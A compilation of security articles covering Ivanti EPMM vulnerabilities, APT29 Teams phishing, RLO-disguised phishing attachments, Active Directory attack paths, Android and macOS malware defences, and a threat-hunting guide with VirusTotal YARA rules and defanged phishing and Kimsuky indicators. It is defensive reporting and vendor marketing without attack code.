The first of the two is a new path traversal vulnerability, tracked as CVE-2023-35081 (CVSS 7.2), allowing arbitrary file write capabilities. Threat actors exploiting this vulnerability could potentially bypass admin authentication and ACL restrictions to execute OS commands. All supported versions of EPMM, including releases 11.10, 11.9, 11.8, and older are impacted.

The company says that this new vulnerability differs from July’s CVE-2023-35078; however, it acknowledged that attackers could chain the two together for malicious purposes. A joint cybersecurity advisory from both CISA and the Norwegian National Cyber Security Centre (NCSC-NO) explains that chaining the two flaws could translate to privileged access across EPMM systems and the ability to execute uploaded files such as webshells.

The second vulnerability announced this week is tracked as CVE-2023-35082 (CVSS 10.0) and could allow unauthenticated attackers to access the API in older, unsupported versions of the product (11.2 and below).

If exploited, attackers could access users’ personally identifiable information (PII) and make unauthorized changes to the server. Security researchers noted the bug’s close relation to last week’s remote unauthorized API access flaw in that both target the permissive qualities of certain entries in the mifs web application’s security filter chain.

Ivanti has released patches for all three vulnerabilities within the span of two weeks and urged its customers to upgrade to the latest version of EPMM and monitor their systems for signs of breaches.

The Ugly | Microsoft Domains Leveraged in Russian-Backed Teams Phishing Campaigns

Cyber threat group APT29, attributed to Russia’s Foreign Intelligence Service (SVR), was linked this week to a series of attacks on dozens of organizations. Likely indicative of an espionage campaign, the group targeted government agencies, non-government organizations (NGOs), IT and tech services, private manufacturing, and media sectors through phishing messages sent via Microsoft Teams.

According to a report released Wednesday, the attackers used compromised Microsoft 365 tenants to create tech support-themed domains and sent various social engineering lures to trick victims into granting approval for multi-factor authentication (MFA) prompts. The new domains were part of a legitimate Microsoft domain ‘onmicrosoft.com’ that is used when a custom domain is not successfully created.

Using this domain, the spoofed tech support messages would have appeared more trustworthy to the targeted users.

A fake Microsoft Teams message request used in APT29's latest campaign (Source: Microsoft).
A fake Microsoft Teams message request used in APT29’s latest campaign (Source: Microsoft).

APT29 has been operating since at least 2008, crafting attacks against government networks in NATO member countries and in Europe, think tanks, and research institutes. Notoriously, the group is attributed to the SolarWinds supply chain attack that led to the compromise of as many as 18,000 government entities and Fortune 500 companies, at least nine federal agencies, and more than 100 businesses globally.

This latest activity is a timely reminder of just how pernicious and persistent these groups are, and organizations in all verticals are urged to be equally relentless in reinforcing strong cyber hygiene and continued awareness and education efforts.

Teach a Man to Phish and He’s Set for Life

One frustrating aspect of email phishing is the frequency with which scammers fall back on tried-and-true methods that really have no business working these days. Like attaching a phishing email to a traditional, clean email message, or leveraging link redirects on LinkedIn, or abusing an encoding method that makes it easy to disguise booby-trapped Microsoft Windows files as relatively harmless documents.

KrebsOnSecurity recently heard from a reader who was puzzled over an email he’d just received saying he needed to review and complete a supplied W-9 tax form. The missive was made to appear as if it were part of a mailbox delivery report from Microsoft 365 about messages that had failed to deliver.

The reader, who asked to remain anonymous, said the phishing message contained an attachment that appeared to have a file extension of “.pdf,” but something about it seemed off. For example, when he downloaded and tried to rename the file, the right arrow key on the keyboard moved his cursor to the left, and vice versa.

The file included in this phishing scam uses what’s known as a “right-to-left override” or RLO character. RLO is a special character within unicode — an encoding system that allows computers to exchange information regardless of the language used — that supports languages written from right to left, such as Arabic and Hebrew.

Look carefully at the screenshot below and you’ll notice that while Microsoft Windows says the file attached to the phishing message is named “lme.pdf,” the full filename is “fdp.eml” spelled backwards. In essence, this is a .eml file — an electronic mail format or email saved in plain text — masquerading as a .PDF file.

“The email came through Microsoft Office 365 with all the detections turned on and was not caught,” the reader continued. “When the same email is sent through Mimecast, Mimecast is smart enough to detect the encoding and it renames the attachment to ‘___fdp.eml.’ One would think Microsoft would have had plenty of time by now to address this.”

Indeed, KrebsOnSecurity first covered RLO-based phishing attacks back in 2011, and even then it wasn’t a new trick.

Opening the .eml file generates a rendering of a webpage that mimics an alert from Microsoft about wayward messages awaiting restoration to your inbox. Clicking on the “Restore Messages” link there bounces you through an open redirect on LinkedIn before forwarding to the phishing webpage.

As noted here last year, scammers have long taken advantage of a marketing feature on the business networking site which lets them create a LinkedIn.com link that bounces your browser to other websites, such as phishing pages that mimic top online brands (but chiefly Linkedin’s parent firm Microsoft).

The landing page after the LinkedIn redirect displays what appears to be an Office 365 login page, which is naturally a phishing website made to look like an official Microsoft Office property.

In summary, this phishing scam uses an old RLO trick to fool Microsoft Windows into thinking the attached file is something else, and when clicked the link uses an open redirect on a Microsoft-owned website (LinkedIn) to send people to a phishing page that spoofs Microsoft and tries to steal customer email credentials.

According to the latest figures from Check Point Software, Microsoft was by far the most impersonated brand for phishing scams in the second quarter of 2023, accounting for nearly 30 percent of all brand phishing attempts.

An unsolicited message that arrives with one of these .eml files as an attachment is more than likely to be a phishing lure. The best advice to sidestep phishing scams is to avoid clicking on links that arrive unbidden in emails, text messages and other mediums. Most phishing scams invoke a temporal element that warns of dire consequences should you fail to respond or act quickly.

If you’re unsure whether a message is legitimate, take a deep breath and visit the site or service in question manually — ideally, using a browser bookmark to avoid potential typosquatting sites.

AD Security Assessments and Attack Paths | How to Achieve Greater Visibility

Active Directory (AD) has become a primary target for attackers launching identity-centric attacks. Fortunately, there are several tools available to help enterprise security teams get clearer visibility into their Active Directory instances and address any vulnerabilities they uncover.

One popular tool in use by analysts is Attack Path graphs, which can be used to show the possible paths an attacker can take to escalate from a standard user all the way to a highly privileged account, such as a prized Domain Admin.

While this kind of visualization can be helpful, it is no substitute for an Active Directory assessment tool that not only closes vulnerabilities but encourages best practices. To illustrate the difference, in this post we’ll compare both approaches across two example scenarios that represent common situations found in the enterprise.

Case Study: Basic Privilege Escalation

In the first scenario, we’ll look at a simple Attack Path and compare it to the results of an AD security assessment for the same issue.

In our first example, a compromised standard user ‘Bob’ happens to be a member of a larger Engineering group, which is a subset of a CAD Tools group. Due to poor configuration and separation of privileges, this group is also a member of a Service Installers group, which itself happens to be a member of the Domain Admins group.

Clearly, even though Bob is supposed to have only Standard User privileges, this nested set of relationships allows an attacker who compromises Bob’s account to gain Domain Admin rights.

At this point, let’s explore the context an AD security assessment tool can provide in a situation like this, and how administrators might be able to use this information to mitigate this issue and prevent it from happening again.

An AD security assessment tools will provide:

  • A list of all users that have privileged access. This would comprise all members from the nested groups of all privileged groups.
  • A list of groups nested within the privileged group to be removed. This is the shortcut the administrator needs to mitigate the issue.
  • The best practice of not nesting groups into privileged groups. This eliminates choke points so that it’s more difficult for members to be granted unintentional privileged access. This is the guidance the administrator needs to prevent the issue.

The second and third items are the most critical. If we simply removed the Service Installers group from the Domain Admins group, (along with any others that may also be nested), the compromised standard user account would no longer be a Domain Admin. By addressing the vulnerability and following best practices, administrators would no longer have to examine graphs and determine where to prune group memberships, essentially making the graph irrelevant.

Case Study: Credentials Cracking

Let’s examine another simple Attack Path.

In the attack path above, a user’s computer (COMPUTER 1) has been compromised. From there, an attacker successfully cracks the computer’s local administrator account credentials. The attacker then uses that local administrator account’s password to login to another computer (COMPUTER 2), which was (mis)configured for ease of administration with the same credentials. On COMPUTER2, the attacker cracks the Domain Admin account’s hash, successfully elevating their access.

An Active Directory security assessment tool can quickly mitigate this risk by relaying the following information to an analyst:

  • LAPS (Local Administrator Password Solution) was not detected to be configured in Active Directory. If it was, this would have prevented the attacker from moving from COMPUTER1 to COMPUTER2 using the same local administrator password. Making sure every local administrator account has a different, rotating password is a best practice. LAPS would meet this need.
  • A Domain Admin account had logged into a workstation in the past, leaving a hash behind that the attacker could use. The best practice recommended here is to only use Domain Admin accounts to logon to domain controllers and to clear all hashes on workstations and member servers.

By following the mitigation steps and best practice recommendations of an AD security assessment tool, an administrator can eliminate the potential Attack Path of an attacker and prevent them from exploiting these misconfigurations and vulnerabilities.

Active Directory Risks That Attack Paths Miss

Attack Paths are crafted to show known attacks, whereas closing vulnerabilities eliminates both these and, often, unknown vectors, too. Consequently, it’s more important to eradicate vulnerabilities and follow best practices.

The pictures that Attack Paths paint are an incomplete representation of the actual Active Directory security situation. Graphs showing how the organization could be vulnerable are not as effective as tools that can ensure the AD infrastructure is not exposed nor will be in the future.

Below are some examples of attacks that would not be suitable for elaborate Attack Path graphs, yet it is vital for an AD security assessment to detect each of them.

  • Brute force password attacks – An assessment should detect credentials which use commonly known passwords, dictionary words, or attempts to enter every possible character combination until a password has been “guessed”.
  • Unconstrained delegation exposures – When an AD user or computer object has been delegated to any service using Kerberos. If compromised, this can allow the attacker to impersonate the authenticated account to any service.
  • Protecting your Active Directory from AdminSDHolder attacks – Adding users or groups to the AdminSDHolder template in Active Directory that is “stamped” on every privileged user and group’s ACL, giving them rights over those accounts.

Singularity™ Ranger® AD scans the Active Directory environment for vulnerabilities such as these and many more, guiding administrators on how to mitigate them and ensuring best practices to prevent them in the future.

Conclusion

While Attack Paths are interesting graphs that can enlighten administrators as to how potential attacks can take place on the network, they are no substitute for a proactive approach that eliminates known vulnerabilities and enforces best practices. Singularity Ranger AD finds vulnerabilities and guides administrators to close them, and keep them closed.

Singularity RANGER | AD Assessor
A cloud-delivered, continuous identity assessment solution designed to uncover vulnerabilities in Active Directory and Azure AD

How Malicious Android Apps Slip Into Disguise

Researchers say mobile malware purveyors have been abusing a bug in the Google Android platform that lets them sneak malicious code into mobile apps and evade security scanning tools. Google says it has updated its app malware detection mechanisms in response to the new research.

At issue is a mobile malware obfuscation method identified by researchers at ThreatFabric, a security firm based in Amsterdam. Aleksandr Eremin, a senior malware analyst at the company, told KrebsOnSecurity they recently encountered a number of mobile banking trojans abusing a bug present in all Android OS versions that involves corrupting components of an app so that its new evil bits will be ignored as invalid by popular mobile security scanning tools, while the app as a whole gets accepted as valid by Android OS and successfully installed.

“There is malware that is patching the .apk file [the app installation file], so that the platform is still treating it as valid and runs all the malicious actions it’s designed to do, while at the same time a lot of tools designed to unpack and decompile these apps fail to process the code,” Eremin explained.

Eremin said ThreatFabric has seen this malware obfuscation method used a few times in the past, but in April 2023 it started finding many more variants of known mobile malware families leveraging it for stealth. The company has since attributed this increase to a semi-automated malware-as-a-service offering in the cybercrime underground that will obfuscate or “crypt” malicious mobile apps for a fee.

Eremin said Google flagged their initial May 9, 2023 report as “high” severity. More recently, Google awarded them a $5,000 bug bounty, even though it did not technically classify their finding as a security vulnerability.

“This was a unique situation in which the reported issue was not classified as a vulnerability and did not impact the Android Open Source Project (AOSP), but did result in an update to our malware detection mechanisms for apps that might try to abuse this issue,” Google said in a written statement.

Google also acknowledged that some of the tools it makes available to developers — including APK Analyzer — currently fail to parse such malicious applications and treat them as invalid, while still allowing them to be installed on user devices.

“We are investigating possible fixes for developer tools and plan to update our documentation accordingly,” Google’s statement continued.

Image: ThreatFabric.

According to ThreatFabric, there are a few telltale signs that app analyzers can look for that may indicate a malicious app is abusing the weakness to masquerade as benign. For starters, they found that apps modified in this way have Android Manifest files that contain newer timestamps than the rest of the files in the software package.

More critically, the Manifest file itself will be changed so that the number of “strings” — plain text in the code, such as comments — specified as present in the app does match the actual number of strings in the software.

One of the mobile malware families known to be abusing this obfuscation method has been dubbed Anatsa, which is a sophisticated Android-based banking trojan that typically is disguised as a harmless application for managing files. Last month, ThreatFabric detailed how the crooks behind Anatsa will purchase older, abandoned file managing apps, or create their own and let the apps build up a considerable user base before updating them with malicious components.

ThreatFabric says Anatsa poses as PDF viewers and other file managing applications because these types of apps already have advanced permissions to remove or modify other files on the host device. The company estimates the people behind Anatsa have delivered more than 30,000 installations of their banking trojan via ongoing Google Play Store malware campaigns.

Google has come under fire in recent months for failing to more proactively police its Play Store for malicious apps, or for once-legitimate applications that later go rogue. This May 2023 story from Ars Technica about a formerly benign screen recording app that turned malicious after garnering 50,000 users notes that Google doesn’t comment when malware is discovered on its platform, beyond thanking the outside researchers who found it and saying the company removes malware as soon as it learns of it.

“The company has never explained what causes its own researchers and automated scanning process to miss malicious apps discovered by outsiders,” Ars’ Dan Goodin wrote. “Google has also been reluctant to actively notify Play users once it learns they were infected by apps promoted and made available by its own service.”

The Ars story mentions one potentially positive change by Google of late: A preventive measure available in Android versions 11 and higher that implements “app hibernation,” which puts apps that have been dormant into a hibernation state that removes their previously granted runtime permissions.

Mac Admins | Why Apple’s Silent Approach to Endpoint Security Should be a Wake-Up Call

If there’s one thing that everyone should be able to agree on about Apple, it is that the company really does think different when it comes to the design of its products, and this is nowhere more obvious than in the company’s approach to endpoint security. Users will find no Defender-like security center built into macOS, and admins and IT teams will search in vain for Apple web portals to log into or extra licenses to buy for ‘top tier’ telemetry.

Unlike rival OS vendors, Apple does endpoint security when – and where – admins and users aren’t looking. This approach has served Apple well from a marketing perspective – there’s a widespread if somewhat misplaced belief that macOS is more secure than Windows – but for small to medium-sized enterprises relying entirely on Apple to keep them safe, this lack of visibility is something to be addressed.

In this post, we’ll shed light on three areas of macOS security that are crucial to understand for businesses that do not currently deploy additional endpoint protection on their macOS devices.

Apple’s Approach to Platform Security

Last updated in May 2022, Apple’s most recent public documentation about protecting against malware on macOS states that its malware defenses are structured in three layers:

Service Technologies
Prevent launch or execution of malware App Store, or Gatekeeper combined with Notarisation
Block malware from running on customer systems Gatekeeper, Notarisation and XProtect
Remediate malware that has executed XProtect

None of the technologies responsible in these layers has much in the way of user or admin-controlled granularity: it’s not possible, for example, to allow or exclude specific applications or code across users or devices. On a single device, a user can make extremely broad system policy decisions (such as allow or deny all apps sourced from outside the App Store), but even then – unless the system is administered by an MDM solution – that policy can be overridden by local users, even without administrator rights.

More concerning from an enterprise security perspective is that there is little visibility into what code has been blocked, when and why, nor is it obvious when these scans are being performed or how effective they have been.

This is a particular worry in terms of malware remediation, which happens silently in the background without warning to the user. In an enterprise setting, this is simply not sufficient: security teams need to understand when malware was introduced to the system, how long it was there and where malware came from if they are to adequately defend the enterprise.

1. XProtect Signatures | Missing Out On the Latest Malware

According to Apple,

macOS includes built-in antivirus technology called XProtect for the signature-based detection and removal of malware. The system uses YARA signatures, a tool used to conduct signature-based detection of malware, which Apple updates regularly.

The last update to Apple’s XProtect.bundle which contains these YARA signatures was made on June 29th, though the update may have not been released till some days later depending on location of the device.

Unfortunately, this update did not include any changes to the file signatures that Apple says power XProtect’s blocking abilities. The YARA file bears the same hash as version 2166, updated last February.

If one were to go by the version numbers, there should have been 7 updates to XProtect’s YARA rules in the last 12 months, but in fact only three have actually been observed in our test machines. Moreover, the difference between version 2165 released last November and the version available today is a mere three additional rules for only two malware families: one for Keysteal and two for a cryptominer known to Apple as Honkbox.

Since both SentinelOne and many other vendors have reported on multiple new macOS malware strains in the last few months alone, it should be concerning to users and admins relying entirely on XProtect’s rules that they are so far behind the rest of the industry.

2. XProtectRemediator | Hiding Infections After-the-Fact

Despite the lack of updates to Apple’s primary malware blocking tool, the company has been updating its MRT-replacement tool XProtectRemediator more regularly. XProtectRemediator runs at intervals of around 6 hours per day, looking for a small collection of known malware families.

While the increased attention there is an improvement on the old MRT.app, the focus on remediation rather than blocking should be of concern to enterprise security teams. 6 hours is far too long for infostealers to be in the organization, particularly as they take only seconds to do their work. Session cookies are primary targets for threat actors to worm their way further into organizations and turn compromises from a single Mac into a serious breach, such as happened recently at CircleCI.

As noted above, there is no user interface on macOS for understanding what malware has been remediated, when or how it was introduced into the system. However, as of macOS Ventura, system administrators without 3rd party visibility tools can attempt to leverage the eslogger tool introduced with macOS 13.

Unfortunately, eslogger was not built with enterprise scale in mind. It will require some building of infrastructure and external tools in order to bring results from across a fleet into a central database that could be monitored and mined for data. There are better 3rd party tools built for the job that will require less investment and give greater return.

In either case, unless security teams are proactive, Apple’s XProtectRemediator will silently remove malware that it discovers without alerting the user or the administrator that an infection had ever occurred. Similarly, the tool will neither warn of nor log suspicious or malicious activity that it hasn’t been explicitly programmed to detect.

Relying on silent remediation is a high-risk strategy for both enterprises and Apple. A risk of a false positive in this situation could cause serious harm to users and businesses, so it is likely that Apple has designed the tool extremely conservatively in terms of what it will detect and silently remove.

For enterprises, the inability to receive alerts and the difficulty of inspecting logs means there is little chance of catching infections missed by XProtectRemediator, of tracking down the root cause of those that it removes, or of further investigating the incident and its impact on the organization.

3. XProtectBehaviorService | Hidden Behavioral Detections

A recent addition to Apple’s malware detection technologies which the company has not publicly documented yet goes by the name of XProtectBehaviorService.

At present, the service merely silently logs details of applications that violate certain pre-programmed behavioral rules, currently defined in /usr/libexec/syspolicyd.

These rules, internally referred to as “bastion rules”, log violations in a hidden sqlite database located at /var/protected/xprotect/XPdb. It is commendable that Apple is logging access to data held in enterprise applications like Slack and Teams, as well as various browser and chat apps. The question remains, however, as to what access Apple intends to give users – and more importantly admin, IT and security teams – to this service and the information it gathers as it develops further.

For example, those logs were put to good use recently by incident responders investigating an APT intrusion that infected four macOS Ventura systems and which was neither blocked by XProtect nor removed by XProtectRemediator.

Although that data is now there to be found by incident responders, it falls on those responsible for security to gather it and learn how to use it. It serves as a case in point of how IT teams that continue to rely entirely on Apple for protection must still proactively engage with the macOS devices in their fleet and mine them for the hidden logs and telemetry that Apple stashes away.

Conclusion

Apple’s approach to security is, like many other things it does, different to other OS vendors. That’s neither a good thing nor a bad thing in itself; what matters is that admins are aware of how their OS is dealing with security events. A nice, quiet system doesn’t necessarily mean a safe and secure system.

Knowing what’s happening on the company’s endpoints is the first step to securing them, and there are a lot more security-related events occurring under the hood of macOS than is obvious to the casual observer.

As a vendor, it should come as no surprise that we urge organizations to deploy additional security on their macoS devices: naturally, we believe in what we do and the reasons for doing it. But even those that are not yet ready to heed that message can take away a vital lesson from this discussion: actively engage with the Macs in the fleet, mine them for logs and ensure that the in-house security team knows at least as much as Apple does about what’s happening on the organization’s Macs.

To learn more about how SentinelOne can help protect the Macs in your fleet, contact us or request a free demo.

Illicit Brand Impersonation | A Threat Hunting Approach

Since the start of 2023, brand impersonation has become the center of many questions we receive from everyday network defenders. While at the start of the year we reported on the heavy spike in malicious Google search ads, the activity continues to this day across many platforms, and does not get as much attention as it deserves. Additionally, while tracking more capable and often state-sponsored threat actors, we continually observe brands being impersonated for illicit use, including credential phishing and malware delivery.

Consequently, organizations find themselves grappling with two critical challenges: first, identifying and thwarting illicit brand impersonation aimed at targeting them, and second, effectively safeguarding their networks and users. Security and threat researchers face a similar, albeit magnified, responsibility as they handle these concerns for numerous entities.

Let’s explore some examples of opportunistic and targeted threat actors impersonating trusted brands and how security researchers can make use of new tooling for the purposes of hunting and tracking them moving forward.

New Tools and Monitoring Techniques

VirusTotal has released a new feature called NetIoc, essentially expanding the well known YARA engine to network telemetry and data. VirusTotal is a core resource for researchers, security vendors, network defenders, and even investigative journalists. With the incorporation of this new capability, it becomes imperative for others to familiarize themselves with and harness its full potential. Moreover, it exemplifies an approach that other security tools can and, indeed, should emulate in the context of engineering solutions for network data detection opportunities.

Many opportunities for hunting my favorite threat actors come to mind with this new capability. While APTs consume most of my attention, they are not the most common threat or concern for the majority of network defenders. For that, let’s look at some malicious activity impacting far more organizations.

Mimicking Trusted Pages

In February of this year, we wrote about a campaign targeting cloud service credentials, specifically AWS logins. While the delivery of this is quite rare for the moment, being a direct Google advertisement, attackers continue to innovate through many other ways including phishing emails and non-Google ads to name only two.

Fake AWS Login Page
Fake AWS Login Page

So how can we detect illicit login pages such as these? First, we have to note that many phishing pages reuse the content from the services they mimic, such as URL icons, body content, and images. If the VirusTotal scanner catches it fast enough, we can track down some commodity activity with this in mind.

import "vt"
rule aws_monitor {
	condition:
        vt.net.domain.new_domain and
        (vt.net.url.favicon.dhash == "4026d4f494f8738c" //AWS Name Icon
        or
        vt.net.url.favicon.dhash == "c8e3b88aaa88cbf8" //AWS Docs Icon
        or
        for any link in vt.net.url.outgoing_links: ( link matches /signin.aws.amazon.com.*/ )
        or
        vt.net.domain.raw matches /aws/)
}

This rule will trigger on any new URL which contains the same favicon used on the AWS login page or docs page, or contains an outgoing link to the legitimate AWS sign in page.

The main fear here is the potential for false positives or negatives, but that can be tuned with additional conditions of vt.net.domain.new_domain to weed out common legitimate domain hits, using VT tags, or simply reducing the condition specifics.

In many cases we’ve observed, a reuse of the favicon combined with a new domain can be quite wide and catch lots of interesting activity.

import "vt"
rule aws_monitor_2 {
    condition:
        vt.net.domain.new_domain and
        (vt.net.url.favicon.dhash == "4026d4f494f8738c" //AWS Name Icon
        or
        vt.net.url.favicon.dhash == "c8e3b88aaa88cbf8" //AWS Docs Icon
        )
}

AWS is just one example, threat hunters could instead use this for less common pages of value like download sites or internal intranet employee logins.

Reused Characteristics of Infrastructure – Commodity Targeting

One useful way to identify automated and often large-scale phishing campaign infrastructure is through monitoring and alerting on actor specific characteristics of their phishing sites.

Earlier this month Malwarebytes reported on malicious Google ads mimicking USPS with very realistic links, ultimately seeking mass collection of financial details. Looking into one of these domains (super-trackings[.]com), notice the reuse of a Yandex Tracker ID used for normal website analytics; however, this ID is owned by the specific threat actor associated with the USPS phishing campaign. The specific tracker is reused across the common tracking.php files, not the domain landing page.

Yandex Tracker 93030690
Yandex Tracker 93030690

We can look back historically by searching for the tracker directly in VirusTotal. With many URL results, we can extract the following unreported phishing domains tied to the same actor:

uspps-onlynee[.]biz
hetclick[.]biz
uspps-only[.]ink
www.uspps-only[.]ink
super-trackings[.]com
uspps-onlyne[.]ink
usps.tracking-check[.]me
tracking-checks[.]me
goodstracks[.]me
usps-onlines[.]biz
diy-trackng[.]com

Instead of querying VirusTotal manually for this tracker within new URLs, let’s instead monitor proactively to get alerts as soon as they are seen. For that, we can make use of a very simple rule monitoring for that same tracker.

import "vt"
rule usps_phisher_tracker {
    condition:
        for any tracker in vt.net.url.trackers: (
          tracker.id == "93030690")
}

A tracker can easily be changed by an actor, but the above example was used by the attacker from April to July 2023, so clearly they are rolled into new campaigns more than we might expect, depending on the attacker and campaign of course.

Reused Characteristics of Infrastructure – APTs

Even our more interesting APTs can be tracked in similar reuse of characteristics across their campaigns. Let’s take a look at Kimsuky, one of a number of North Korean attributed threat actors we actively monitor.

In May of this year, we wrote about Kimsuky evolving reconnaissance capabilities in a new global campaign, which was an interesting campaign making use of a new malware component we call ReconShark. In some of the malicious URLs, we can see the actor making use of a config.php file, reusing a small script for warning to enable JavaScript and acting as an input for credential theft functionality.

Kimsuky’s config.php
Kimsuky’s config.php

The new VT templates save us time here, as we can hit a single button to get the rule nearly written for us:

VirusTotal NetIoc Template
VirusTotal NetIoc Template

Passing in our config.php SHA256 hash, and renaming, we get the following rule:

rule apt_nk_kimsuky_phishing_script {

    condition:
        vt.net.url.new_url and
        vt.net.url.downloaded_file.sha256 == "256fa5009e8e82258876325b7d36f41cc3e74e85627663206b042eec8736ce6a"

}

While beta testing NetIoc with this rule, the file triggered across many unreported Kimsuky controlled URLs, and can also be found going back multiple years. In fact, while testing live detections, MalwareHunterTeam also happened to catch one, highlighting the pivot potential to malicious Kimsuky attributed .hwp documents. This domain was later reported on by the AhnLab team. So not only does the technique work, it can lead to the discovery of interesting new APT brand-impersonating campaigns.

MalwareHunterTeam Kimsuky Linked Tweet
MalwareHunterTeam Kimsuky Linked Tweet

Here is a list of Domains/URLs which contain our Kimsuky .php file. Be warned, some of these are legitimate but compromised domains and go back a few years:

namsouth[.]com
nknews[.]pro/config.php
reasope[.]org/config.php
voesami[.]com/config.php
bit-albania[.]com/config.php
yonsei[.]lol/sss.php
jacobsenfamilyholdings[.]com/config.php
okbus.or[.]kr/config/config.php
renaissancenft[.]io/wp-content/plugins/download-plugin/plugins.php
stmwa[.]de/work/config/data.php
csmss[.]org/admin/uploads/award/award28.php
167.172.113[.]157/
108.179.214[.]134/
174.138.30[.]233/
absolutemedia[.]net.au/
absolutemedia[.]net.au/testing/wp-content/intelmanagertools.exe
absolutemedia[.]net.au/testing/wp-includes/Spectrum
absolutemedia[.]net.au/testing/flash-x32-adobe-add-on.exedl.netprog.net
absolutemedia[.]net.au/testing/flash-x32-Adobe-add-on.exe
eskulap-jarocin[.]pl/
blogtify[.]com/wp-includes/config.php
kevinspie.co[.]kr/data/category/faq/faq.php
hankevin.cafe24[.]com/data/category/faq/faq.php
educacionit[.]com/images-clientes/4O4.php
naturamosana[.]be/css/main.php
wincenty-faber[.]pl/ksiki/ksiki-dla-dzieci
wincenty-faber[.]pl/dla-dzieci
escolarainhadleonor[.]eu/aee/
wincenty-faber[.]pl/dla-dzieci/publikowane-w-ksikach/90
217.219.131[.]139/db.php
chromatogramma[.]ru/book/export/html/3
aprendizajevirtual.une[.]net.co/lang/language.php

This approach, again, may need fine-tuning depending on context, but it offers a good example of one way to do such tracking. There are many other methods available for successfully tracking Kimsuky brand impersonation and other actors including hostname similarities against their normally targeted organizations, or even URL patterns of known toolkits to name a few. Happy Hunting!

Conclusion

The persistent use of brand impersonation by opportunistic and sophisticated threat actors for illicit activities like credential phishing and malware distribution warrants greater awareness and technical capabilities.

By leveraging the latest tooling and staying vigilant, security and threat researchers can play a pivotal role in mitigating these risks for numerous organizations. As we continue to confront these challenges, it is essential to foster collaboration, knowledge sharing, and innovative solutions to stay ahead in the ever-evolving threat landscape.